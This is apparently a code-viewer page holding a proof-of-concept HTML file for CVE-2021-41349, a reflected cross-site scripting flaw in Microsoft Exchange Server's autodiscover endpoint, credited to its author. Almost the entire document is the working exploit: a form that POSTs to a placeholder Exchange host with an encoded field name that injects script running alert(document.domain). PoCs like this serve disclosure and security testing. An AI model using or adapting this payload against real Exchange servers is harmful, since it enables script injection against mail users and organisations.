CVE-2021-41349 – CVE Helper

README.md

Rendering markdown...

POC / POC.html HTML

⬇ Raw GitHub ✕ Close

<html>
  <!--POC Generated By 0xRobiul-->
  <title> CVE-2021-41349 POC </title>
  <body>
    <h1> Microsoft Exchange Server Spoofing (CVE-2021-41349) POC By 0xRobiul</h1>
  <script>history.pushState('', '', '/')</script>
    <form action="https://mail.target.com/autodiscover/autodiscover.json" method="POST">
      <input type="hidden" name="&lt;script&gt;alert&#40;document&#46;domain&#41;&#59;&#32;a" value="&quot;&lt;&#47;script&gt;" />
      <input type="hidden" name="x" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>